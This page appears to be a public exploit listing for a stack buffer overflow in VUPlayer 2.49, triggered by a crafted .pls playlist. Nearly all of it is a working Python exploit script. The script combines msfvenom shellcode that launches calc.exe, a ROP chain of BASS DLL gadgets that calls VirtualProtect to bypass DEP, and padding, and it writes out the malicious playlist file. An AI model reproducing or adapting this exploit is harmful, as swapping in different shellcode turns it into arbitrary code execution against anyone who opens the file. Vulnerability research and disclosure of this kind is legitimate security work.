VUPlayer 2.49 .pls Stack Buffer Overflow

2016.08.03
Credit: vportal
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python import os,sys #Tested Windows 7 Home x86 & Windows 10 Home x86_x64 #badchars \x00\x0a\x1a\x20\x40 #msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a\x20\x40" -f python buf = "" buf += "\xbf\x3b\x99\xdd\xa3\xdb\xc4\xd9\x74\x24\xf4\x58\x29" buf += "\xc9\xb1\x33\x31\x78\x12\x03\x78\x12\x83\xfb\x9d\x3f" buf += "\x56\x07\x75\x36\x99\xf7\x86\x29\x13\x12\xb7\x7b\x47" buf += "\x57\xea\x4b\x03\x35\x07\x27\x41\xad\x9c\x45\x4e\xc2" buf += "\x15\xe3\xa8\xed\xa6\xc5\x74\xa1\x65\x47\x09\xbb\xb9" buf += "\xa7\x30\x74\xcc\xa6\x75\x68\x3f\xfa\x2e\xe7\x92\xeb" buf += "\x5b\xb5\x2e\x0d\x8c\xb2\x0f\x75\xa9\x04\xfb\xcf\xb0" buf += "\x54\x54\x5b\xfa\x4c\xde\x03\xdb\x6d\x33\x50\x27\x24" buf += "\x38\xa3\xd3\xb7\xe8\xfd\x1c\x86\xd4\x52\x23\x27\xd9" buf += "\xab\x63\x8f\x02\xde\x9f\xec\xbf\xd9\x5b\x8f\x1b\x6f" buf += "\x7e\x37\xef\xd7\x5a\xc6\x3c\x81\x29\xc4\x89\xc5\x76" buf += "\xc8\x0c\x09\x0d\xf4\x85\xac\xc2\x7d\xdd\x8a\xc6\x26" buf += "\x85\xb3\x5f\x82\x68\xcb\x80\x6a\xd4\x69\xca\x98\x01" buf += "\x0b\x91\xf6\xd4\x99\xaf\xbf\xd7\xa1\xaf\xef\xbf\x90" buf += "\x24\x60\xc7\x2c\xef\xc5\x37\x67\xb2\x6f\xd0\x2e\x26" buf += "\x32\xbd\xd0\x9c\x70\xb8\x52\x15\x08\x3f\x4a\x5c\x0d" buf += "\x7b\xcc\x8c\x7f\x14\xb9\xb2\x2c\x15\xe8\xd0\xb3\x85" buf += "\x70\x39\x56\x2e\x12\x45" rop = "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll] rop += "\x5c\xe2\x60\x10" #ptr to &VirtualProtect() [IAT BASSMIDI.dll] rop += "\xf1\xea\x01\x10" #MOV EAX,DWORD PTR DS:[EAX] # RTN [BASS.dll] rop += "\x50\x09\x03\x10" #XCHG EAX,ESI # RETN [BASS.dll] rop += "\x0c\x80\x60\x10" #POP EBP # RETN 0x0C [BASSMIDI.dll] rop += "\x9f\x53\x10\x10" #& jmp esp BASSWMA.dll rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll] rop += "\x90"*12 rop += "\xff\xfd\xff\xff" #201 in negative rop += "\xb4\x4d\x01\x10" #NEG EAX # RETN [BASS.dll] rop += "\x72\x2f\x03\x10" #XCHG EAX,EBX # RETN [BASS.dll] rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll] rop += "\xc0\xff\xff\xff" #40 in negative rop += "\xb4\x4d\x01\x10" #NEG EAX # RETN [BASS.dll] rop += "\x6c\x8a\x03\x10" #XCHG EAX,EDX # RETN [BASS.dll] rop += "\x07\x10\x10\x10" #POP ECX # RETN [BASSWMA.dll] rop += "\x93\x83\x10\x10" #&Writable location [BASSWMA.dll] rop += "\x04\xdc\x01\x10" #POP EDI # RETN [BASS.dll] rop += "\x84\xa0\x03\x10" #RETN [BASS.dll] rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll] rop += "\x90"*4 rop += "\xa5\xd7\x01\x10" #PUSHAD # RETN [BASS.dll] exploit = "\x41"*1012 + rop + "\x90"*8 + buf print "len + " + str(len(rop)) file = open('/root/Desktop/exploit_development/VUPlayer/boom.pls','w') file.write(exploit) file.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top